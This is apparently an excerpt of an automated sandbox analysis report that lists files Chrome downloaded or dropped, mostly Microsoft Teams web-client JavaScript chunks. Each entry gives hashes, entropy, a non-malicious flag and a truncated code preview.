                                                                                                                                                                                                                          SSDEEP:384:oyw1NskKom67NmJoZm5U6DJOTkoAPru8uA0BvkrGgmTAKd0Dfs3w:loNI3hJOTrY0BvkrXmTAKdKfsw
                                                                                                                                                                                                                          MD5:E98A29DDB910BFCFBCA3B6E6D5F1D386
                                                                                                                                                                                                                          SHA1:FAD7F04C1FA5EED36A43313430962F07BECB13FE
                                                                                                                                                                                                                          SHA-256:2F75B07E3C3ED925D2E97B334FD2BA0FE42C2B0291C3F9C1AA6AB6152AFC3296
                                                                                                                                                                                                                          SHA-512:51BB8DC7A59F707E4239DA4F96313A7018BCDFF9B051EF30A7D0914DC3C7D8195F76A32F846FE492942638B8BF8480F1BD8AE37429045C6087B62F1AF37B39C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[795307],{554186:(t,e,r)=>{var i=r(105117),n=r(94354),s=n;s.v1=i,s.v4=n,t.exports=s},997811:t=>{for(var e=[],r=0;r<256;++r)e[r]=(r+256).toString(16).substr(1);t.exports=function(t,r){var i=r||0,n=e;return[n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]]].join("")}},596778:t=>{var e="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(e){var r=new Uint8Array(16);t.exports=function(){return e(r),r}}else{var i=new Array(16);t.exports=function(){for(var t,e=0;e<16;e++)0==(3&e)&&(t=4294967296*Math.random()),i[e]=t>>>((3&e)<<3)&255;return i}}},105117:(t,e,r)=>{var i,n,s=r(596778),a=r(997811),o=0,I=0;t.exports=fun
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6267)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):6375
                                                                                                                                                                                                                          Entropy (8bit):4.832022987269524
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:FrN9ujaDgFoSstYXnF82MJxJlFk2jOFbgrHQw4+sX43Jg4bDWUz0R4IsTBTj:FrN9mo7tYr+nGpuTxj
                                                                                                                                                                                                                          MD5:E3947426289E682F86072FAD145E30FE
                                                                                                                                                                                                                          SHA1:883FA22D817AB2BF256D5780ACA60C519F221554
                                                                                                                                                                                                                          SHA-256:E34614C2F439E569A2D4D5FDDBEC5341E66C3544D6918E37B058E5D9051A9BAB
                                                                                                                                                                                                                          SHA-512:2FA3C2A382D022D3F85DED713E21AEB29908EC829E490D85BD8D8EA4785B715F1C12289200755FC0625B4121794D61D6CD026A17EA79C0F63754C054C6C8B1CA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/505772-1af27dc373b0b4e5.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[505772],{598476:(e,C,t)=>{t.d(C,{A:()=>r});var a=t(513432),l=t(395225),n=t.n(l),s=t(485529),c=t(829289),r=(0,s.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(c.Q.outline,C.outlinePart)},a.createElement("path",{d:"M11.5 8.5C11.5 8.22386 11.2761 8 11 8H9V6C9 5.72386 8.77614 5.5 8.5 5.5C8.22386 5.5 8 5.72386 8 6V8H6C5.72386 8 5.5 8.22386 5.5 8.5C5.5 8.77614 5.72386 9 6 9H8V11C8 11.2761 8.22386 11.5 8.5 11.5C8.77614 11.5 9 11.2761 9 11V9H11C11.2761 9 11.5 8.77614 11.5 8.5Z"}),a.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8.5 3C11.5376 3 14 5.46243 14 8.5C14 9.83879 13.5217 11.0659 12.7266 12.0196L16.8536 16.1464C17.0488 16.3417 17.0488 16.6583 16.8536 16.8536C16.68 17.0271 16.4106 17.0464 16.2157 16.9114L16.1464 16.8536L12.0196 12.7
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18459)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18567
                                                                                                                                                                                                                          Entropy (8bit):5.392203233495941
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:LAi3uZJIFAgk156FIFhmIJnHBxXX82oXR:LV3uaTktBBZWR
                                                                                                                                                                                                                          MD5:F1E2E125B6A655A912A2732F8DD84774
                                                                                                                                                                                                                          SHA1:19F8C0FC642A97EDD95E7A4623CF81221E2DFDA1
                                                                                                                                                                                                                          SHA-256:F3AE7ECE0106D467F5664C8865AF069E73CBB617BDEC69AE925DF65C516C3E7F
                                                                                                                                                                                                                          SHA-512:92ECB71EC56F834B32B49DC3B45CFF1E5345C32C7919B0BB6B602A55B62B1E5A2669F13CF220233B29A2E646D2CC0E1E85237542ECA3DF01CA03C5148C725C40
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[196395],{692934:(e,n,t)=>{t.d(n,{J4:()=>c,Dl:()=>h,On:()=>m,As:()=>C,Fd:()=>s,L2:()=>p,Oi:()=>v,oU:()=>d,ge:()=>f,wI:()=>I,PX:()=>w,X4:()=>l,kL:()=>g,qP:()=>u});var a=t(938510),r="locale",i="ver",o="name",s=(0,a.o)({UserExt:[0,"user"],DeviceExt:[1,"device"],TraceExt:[2,"trace"],WebExt:[3,"web"],AppExt:[4,"app"],OSExt:[5,"os"],SdkExt:[6,"sdk"],IntWebExt:[7,"intweb"],UtcExt:[8,"utc"],LocExt:[9,"loc"],CloudExt:[10,"cloud"],DtExt:[11,"dt"]}),c=(0,a.o)({id:[0,"id"],ver:[1,i],appName:[2,o],locale:[3,r],expId:[4,"expId"],env:[5,"env"]}),u=(0,a.o)({domain:[0,"domain"],browser:[1,"browser"],browserVer:[2,"browserVer"],screenRes:[3,"screenRes"],userConsent:[4,"userConsent"],consentDetails:[5,"consentDetails"]}),l=(0,a.o)({locale:[0,r],localId:[1,"localId"],id:[2,"id"]}),d=(0,a.o)({osName:[0,o],ver:[1,i]}),f=(0,a.o)({ver:[0,i],seq:[1,"seq"],installId:[2,"installId"],epoch:[3,"epoch"]}),
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1114306
                                                                                                                                                                                                                          Entropy (8bit):5.412208612179107
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:NDU5MrQ4hY8NZEwdTcFNmVoEvzafBhxaVvgNPENd1lBgp2zuMlW95+EL:8EVLvzlVvgNPENd1lWlbj
                                                                                                                                                                                                                          MD5:BA99224E501FF83669493CD37B3A06E7
                                                                                                                                                                                                                          SHA1:0A070AE1C269C1A1B49A90527D19F6FB7875F898
                                                                                                                                                                                                                          SHA-256:CA999166674C6057770EF9C5AFE3FAC8B6D56BFB96A86FF56E91F2F598BAF351
                                                                                                                                                                                                                          SHA-512:61FEB6075EDEBB1E3B77ADE34E1F13F1A00EC7D8DF83E9B1185FCACD9DC63F70C48A38FBDBA96B6C1A7719190CC03AB444548A7E6BEC160934019D05C407FED5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[426009],{937148:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={configs:{auth:{enableAuthV2:[{value:!0}],enableMsal2:[{platform:[1454,1415],value:!0},{value:!0,platform:[1454,1415]}],caeEnabledResources:[{value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://outlook.office.com","https://ic3.teams.office.com","sharepoint","presence"]}],criticalResources:[{platform:[50,51,49],value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://ic3-non-cae.teams.office.com","https://ic3.teams.office.com","https://outlook.office.com/search","https://presence.teams.microsoft.com/","https://noam.presence.teams.microsoft.com/","https://emea.presence.teams.microsoft.com/","https://apac.presence.teams.microsoft.com/","https://presence.gcc.teams.microsoft.com/","https://noamdf.presence.teams.microsoft.com/"]},{value:["https://api.sp
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31824)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):31932
                                                                                                                                                                                                                          Entropy (8bit):5.402734890306889
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:YAFc8qHGsxF3tPtO8ZD6C8pdM3TFDBb8TmUGa31tYb+t0CHkff3BZCNP3HV6gWXl:Zw3prFtambRCgCNP3HV6F
                                                                                                                                                                                                                          MD5:E145B4A903B78134C9726DD10EC3F55E
                                                                                                                                                                                                                          SHA1:9918DD6BD46FAEDA4948AE6E752C97FF39A42232
                                                                                                                                                                                                                          SHA-256:834441EEAEC598092406D14EBAB207C8364182C5495ECD60AC52BAA8615DEEDD
                                                                                                                                                                                                                          SHA-512:F473F48DC6A70FB5C42BEA42D1D01A9C13E4FF2F3DAF67C76520821F8BF72E0B23687DD0235D0471EE8BD15B2CFC124DFBE04DE6E819486B7D18523FA37477A8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/526413-c28bdad77203758d.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[526413,631106],{609949:(e,t,l)=>{l.d(t,{L1:()=>m});var a,o=l(277362),i=l(305536);!function(e){e[e.PngAndHtmlCopied=0]="PngAndHtmlCopied",e[e.HtmlCopied=1]="HtmlCopied"}(a||(a={}));const n=new Map;async function r(e,t,l){const o=e.document,r=new Promise((async(l,a)=>{try{let o=await t;const i=new URL(o.src);if(!(e.location.origin===i.origin||"data:"===i.protocol))try{o=await c(e,o.src)}catch(e){a(new Error(`copyImageElementToClipboard: error on same-origin image load "${e.message}"`))}o.complete?l(o):s(o,(()=>{l(o)}),(e=>{a(new Error(`copyImageElementToClipboard: error on image load "${e.message}"`))}))}catch(e){a(e)}})),d=new Promise((async(e,t)=>{try{const l=await r,a=o.createElement("canvas");a.width=l.naturalWidth,a.height=l.naturalHeight;const i=a.getContext("2d");i?(i.drawImage(l,0,0),e(a)):t(new Error("copyImageElementToClipboard: failed to get canvas 2d context."))}cat
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):545272
                                                                                                                                                                                                                          Entropy (8bit):5.262263354720842
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:qnEtHYxEBCl/xHHP1IxyynnRnJaqD8EULhS7KqwOmdivKJBjPpSYd:qnE5YCBCvPuxZncYfwfBDpRd
                                                                                                                                                                                                                          MD5:9134B5678799A501B8B97AAF92F63387
                                                                                                                                                                                                                          SHA1:9C9DA5A849506D5CCEA2BF0334680B40C07017D9
                                                                                                                                                                                                                          SHA-256:CB39974B85C38817BCA655C969E85AA49EFF2AA22A525C44082A8DB48C856000
                                                                                                                                                                                                                          SHA-512:188A3DA8AB85790AFCADC53B80FDC503CD9132708FF867E428BB5D69DF06BAEC99F9E5A7534230868949C587FC014A1C7596490213ADA5DE6EDCD97D53F66EC5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[443192],{840432:(e,t,n)=>{"use strict";n.d(t,{H:()=>Ea});var r=n(329806),i=n(795317);function o(e){if(!e)throw new Error("Invariant violation")}function a(...e){throw new Error("Unexpected member of typed union: \n"+JSON.stringify(e))}function s(e,t,n){const r=e.get(t);void 0===r?e.set(t,[n]):r.push(n)}function u(e,t,n){let r=e.get(t);return void 0===r&&(r=n(),e.set(t,r)),r}var l=n(132786),c=0,f=1,d=2,p=3,h=4,v=5,g=6,y=7,_=8,m=n(193272),b=Object.defineProperty,E=Object.defineProperties,R=Object.getOwnPropertyDescriptors,S=Object.getOwnPropertySymbols,w=Object.prototype.hasOwnProperty,O=Object.prototype.propertyIsEnumerable,k=(e,t,n)=>t in e?b(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,I={kind:"Field",name:{kind:"Name",value:"__typename"}};function A(e){return"Field"===e.kind}var D=Object.assign((function(e){return(0,m.YR)(e,{SelectionSet:{enter(e,t,n){if(n&&"Operation
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32815)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32923
                                                                                                                                                                                                                          Entropy (8bit):5.433236752671521
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RdSxMwawUxjFewyBUwr0yF51UEMGv3/Ic4RY7x7sLHLZU+4uW1S5olaXy+QwkwAz:97y/0GUEMvhR45m51Qwkwt+g1Se3Hs7f
                                                                                                                                                                                                                          MD5:C23D584D6EE8858DB2DC78E7877E069A
                                                                                                                                                                                                                          SHA1:1CBFCF0EE6AF2AF91027B0342E02DD70ABBF6B7E
                                                                                                                                                                                                                          SHA-256:A01C016B3B32011DA6CDB4861035E0EEC5BA2B31CE4EFC4CB140CC9BAF38BE8A
                                                                                                                                                                                                                          SHA-512:6B9E69A94D9F1D328FF688BC955EBF46F9CAC5ED9649C6662C5777C3F23D71703B94A8DDDCB106149F855039D7492B700E8FCEFCB8D024EB4915597F4F0A1146
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[856736],{670262:(e,t,n)=>{n.d(t,{D:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppButtonQuery($appId:ID!) {appButtonResult(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},845857:(e,t,n)=>{n.d(t,{$:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusEnterQuery($appId:ID!) {focusEnterHandlerState(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},298416:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusRegisterQuery($appId:ID!) {registerFocusEnterHandlerState(appId:$appId) @client {appId,isRegistered}}");return delete this.definitions,this.definitions=e.defini
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22335)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22398
                                                                                                                                                                                                                          Entropy (8bit):4.5557429273086845
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:7EuK/6kvTqLDwd24bXXyiAhSs1hiAhAiSeG3dvBRUqSMkc6u:ouJ5MA4DXc1+ipG3TzSMk0
                                                                                                                                                                                                                          MD5:C44EBBB1C5CC623F903B5EC3F9C94E13
                                                                                                                                                                                                                          SHA1:C1B02B25117E84CC994936D034A3B02D0E6C28DC
                                                                                                                                                                                                                          SHA-256:2C0B8B1B44960FA5584FB5D8F1BB50E21662EC06A70FCA8EEDF8299C69F2E2BA
                                                                                                                                                                                                                          SHA-512:8049E19C0A08A1504B539D34BBBEB642B651CE49B3B5AC2C585E6796CA9CCE6E6A9593094EEECFC8E00E9D30F19EE27743A33E24D6DBDC840E7CBACDBE057DF3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-defaultSocialIconPack-a2c518b6.js",["exports"],(function(a){"use strict";const e=(global.React||guac.react).createElement("path",{d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10A10 10 0 0 0 12 2zM7.055 13.745a.97.97 0 0 1-.073-.509l.182-2.072a.687.687 0 0 1 .29-.364c.182-.11.582.036.582.036l2.619 1.31s.4.181.4.509c-.037.436-.219.436-.364.509l-3.055.654s-.436.146-.581-.073zm4.945.473l-.036 3.018s.036.437-.219.51c-.144.02-.291.02-.436 0l-2.036-.655a.6.6 0 0 1-.291-.364c-.073-.218.182-.545.182-.545l2.036-2.255s.327-.29.582-.145c.254.145.254.436.218.436zm-.364-3.236a.687.687 0 0 1-.581-.182l-2.51-3.418s-.363-.4-.181-.691a.64.64 0 0 1 .363-.291l2.4-.873c.11-.036.218-.145.582.073.255.145.291.655.291.655l.036 4.145s-.072.51-.4.582zm1.419.582l1.636-2.582s.145-.364.436-.327c.152.002.29.085.364.218l1.382 1.636a.676.676 0 0 1 .072.473c-.072.218-.472.363-.472.363l-2.91.837s-.4.073-.545-.182c-.145-.255 0-.51.037-.436zm3.781 3.309L15.6 16.655a.815.815 0 0 1-.4
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):316772
                                                                                                                                                                                                                          Entropy (8bit):5.2685331692118
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:bb+wOOWkWbzpCta0J3ql3yn5nSnF7HnhWiuI:bbmwt/J3eGOBWiH
                                                                                                                                                                                                                          MD5:41CDABB830F5F89F27FBC9B4F45199A1
                                                                                                                                                                                                                          SHA1:CD8285679839EEBB097195CE6F317DF45CA26B87
                                                                                                                                                                                                                          SHA-256:D6BA3EC81CCBA0CD416AB45DCC83B52DE49C6FAE0B43434D6F7EA3A7FCACEE30
                                                                                                                                                                                                                          SHA-512:1CA9941F26893FE2047D8194B4DBC33EAB61BAC9D19C65014C9ACB61358C03E2E8F7C538D45AB0F52A2078E7A86FB41BC80E1437AA87B365BC50E87329B807BA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[865969],{407845:(e,t,r)=>{r.d(t,{vq:()=>c,Ji:()=>d,q8:()=>l});var n=r(514181),o=r(538906),i=r(145353),a=r(789389),s=r(543678);class c{static async createPublicClientApplication(e){const t=await(0,n.K)(e);return new c(e,t)}constructor(e,t){this.controller=t||new o.i(new i.A(e))}async initialize(e){return this.controller.initialize(e)}async acquireTokenPopup(e){return this.controller.acquireTokenPopup(e)}acquireTokenRedirect(e){return this.controller.acquireTokenRedirect(e)}acquireTokenSilent(e){return this.controller.acquireTokenSilent(e)}acquireTokenByCode(e){return this.controller.acquireTokenByCode(e)}addEventCallback(e,t){return this.controller.addEventCallback(e,t)}removeEventCallback(e){return this.controller.removeEventCallback(e)}addPerformanceCallback(e){return this.controller.addPerformanceCallback(e)}removePerformanceCallback(e){return this.controller.removePerforma
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (41773)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):41881
                                                                                                                                                                                                                          Entropy (8bit):5.370482617886562
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:5ZNH3StVknxinkQQ62Eqrr+rAxvapmEKr0f/rt4g40KH:5ZACUnk/rr+rAxipmLr0f/rj4F
                                                                                                                                                                                                                          MD5:22A4CD1FB7CB4D2F60EE393390C9A796
                                                                                                                                                                                                                          SHA1:3D48FD9A67F1BD5D3E4B5909A4254F5D48469987
                                                                                                                                                                                                                          SHA-256:EADFE9A27CDED1FB816A38BC313A0EA56D7C6633A33B3E2621CF9342FBF8BFAA
                                                                                                                                                                                                                          SHA-512:FF5A1AB495EB01AD640E34A1FE6FA2311781017CB111785D0785EF531AF034E3D172871837EC28F78896D21CC4CB6A9AC0356FFDA6661E7D472BEF8C0A3B04EA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/674958-37b4889b0bcb5464.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[674958],{428561:function(e,t,n){var o,i;void 0===(i="function"==typeof(o=function(){"use strict";return function(e,t){var n,o,i,a,r,l,s,u,c,d,p,m,f,h,v,g,x,y,b=e.options.window||b,w=b.document,C=this,I=!1,T=!0,E=!0,_={barsSize:{top:44,bottom:"auto"},closeElClasses:["item","caption","zoom-wrap","ui","top-bar"],timeToIdle:4e3,timeToIdleOutside:1e3,loadingIndicatorDelay:1e3,addCaptionHTMLFn:function(e,t){if(!e.title){for(;t.children[0].firstChild;)t.children[0].removeChild(t.children[0].firstChild);return!1}return t.children[0].innerText=e.title,!0},closeEl:!0,captionEl:!0,fullscreenEl:!0,zoomEl:!0,shareEl:!0,counterEl:!0,arrowEl:!0,preloaderEl:!0,tapToClose:!1,tapToToggleControls:!0,clickToCloseNonZoomable:!0,shareButtons:[{id:"facebook",label:"Share on Facebook",url:"https://www.facebook.com/sharer/sharer.php?u={{url}}"},{id:"twitter",label:"Tweet",url:"https://twitter.com/intent/tweet?tex
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23774)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):23882
                                                                                                                                                                                                                          Entropy (8bit):5.153711856234183
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:xbvNzuDNDJcODNAlioqeB7qNSjnLOkQmGX+g2P/TaZcWZmwrbYMd7svY9YF1vrQO:xbvNzsNDJcODNAlioqeB7qNSVzg2P/uA
                                                                                                                                                                                                                          MD5:0F68D77488B13B60694FF8865D2C5137
                                                                                                                                                                                                                          SHA1:3ABAC8DA7DABDB841331647945C2F7A7AE360FB1
                                                                                                                                                                                                                          SHA-256:9E94D7F6787D2D9CD3E2CBEA298E4C57E6BE6AB73B09BCF7EE3BE4926786E7DF
                                                                                                                                                                                                                          SHA-512:AAD953A529250E1E9D7F41B67758E0F96B1E84B1A25561B3CDA938732C0BD87AC45260D8E7F8898DD668536F46EA597E6F15FFD63F021846E1B7D4A40BE1A969
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[662908],{662908:(e,t,r)=>{r.d(t,{hY:()=>C,dL:()=>P,Xy:()=>M,Rs:()=>H,Fr:()=>U});var n=r(364819),i=r(332752),a=r(802756),s=r(258376),o=r(334499),l=r(175640),c=r(710639);const d=()=>new o.b("div",{});const p=new class{constructor(e={}){this._options={},this.plugins=[],this.nodeError={value:!1,message:""},this.ASTDom=[d()],this.result=[],this._parser=new c.Parser(this,e)}get options(){return this._options}get lastNode(){return this.ASTDom[this.ASTDom.length-1]}onopentag(e,t){const r=new o.b(e,t),n=this.plugins.length;if(n){for(let e=0;e<n;e++){const t=this.plugins[e].exec(this.ASTDom);if(this.nodeError={value:t.error,message:t.errorMessage},this.nodeError.value)break}if(this.nodeError.value)return void this._parser.parseComplete(this.nodeError.message)}this.integrateToAST(r),this.ASTDom.push(r)}ontext(e){if(/\r?\n/.test(e)&&""===e.trim())return;const t=new s.S(e);if(this.lastNod
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23865)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):23973
                                                                                                                                                                                                                          Entropy (8bit):5.061416340897368
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:WK8oz4zTk9y1b23kwfxZ8ZyWT+aTx919J63THsp+MaohwYz8XWOFmTRvVMBKJOHp:J8E4zTk/kwf/8ZyWT+aT163THO+MNOYQ
                                                                                                                                                                                                                          MD5:EDDB2A60AB61195FF094AE85C1DE3815
                                                                                                                                                                                                                          SHA1:F94EE597E6C191263FE264045F892F2F922F6D7C
                                                                                                                                                                                                                          SHA-256:4A4F93510554358AA41E4CF43916D09A24D69B9F8156857794B37D2AB6498C16
                                                                                                                                                                                                                          SHA-512:AE67BADE2413A160DFD7BBA53CF2131EAB65F490B70B9C42927C7900401F872A0931379A18E2AFBBA1ACCA093CD39C72BF3DFC38558179B4827623E02A610217
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/965787-5b58e72ef92ce381.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[965787],{859960:function(t,e,n){var o,i=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])},function(t,e){function n(){this.constructor=t}o(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)});Object.defineProperty(e,"__esModule",{value:!0});var r=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return i(e,t),e}(n(844549).default);e.default=r},844549:(t,e,n)=>{Object.defineProperty(e,"__esModule",{value:!0});var o=n(743203),i=n(139052),r=function(){function t(t){this.root=null,this.compare=t||o.defaultCompare,this.nElements=0}return t.prototype.add=function(t){return!o.isUndefined(t)&&(null!==this.insertNode(this.createNode(t))&&(this.nElements++,!0))},t.prototype.clear=function(){this.root=null,this.nElements=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):125493
                                                                                                                                                                                                                          Entropy (8bit):4.875862681395315
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:af4nJeG7LqUsvynksIdyIYtNUt+rWO5nSRL1lhDytWLaGDAB0kLpVeL0wlyFZ6Y0:9nSRL1lhDytWLaGDAB0kLpV+zb3j
                                                                                                                                                                                                                          MD5:C04C10249202E2D4F4090C8BA60D433D
                                                                                                                                                                                                                          SHA1:71E1B5E7011104CC1E594386C41E71A47FF2A7B8
                                                                                                                                                                                                                          SHA-256:13C8398D6EF09B3BEB13273843E002915C46F34D6090ACFC863CABF8C6B2BEF3
                                                                                                                                                                                                                          SHA-512:36094687C546C72B22A92DDD25C40FE1243D2FC6DAB5F348BB7E35CA64A38CC257016327E8855A20C9695B7417C1961A51FEBDF46490C2A8C7918D14C20B2833
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[525549],{557681:(e,t,a)=>{a.r(t),a.d(t,{default:()=>n});const n={namespace:"calendar",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",aria_label_new_event_action_buttons:"Create and schedule",attendance_report_tab_text:"Attendance",breakout_rooms_tab_text:"Breakout rooms",breakout_rooms_tab_text_preview:"Breakout rooms (Preview)",broadcast_meeting_text:"Live event",broadcast_object_download_title_format:"Download {{meetingObjectName}}",broadcast_objects_recording_transcript:"Recordings & Transcripts",broadcast_objects_transcript:"Transcript",broadcast_scheduling_meeting_duration_limit_tooltip:"You can broadcast to attendees for no more than {{maxMeetingDuration}} hours",calendar_RSVP:"RSVP",calendar_accepted:"Accepted",calendar_access_error_message:"Teams is unable to access your Calendar",calendar_access_error_secondary_message:"Share the error
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (762)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):870
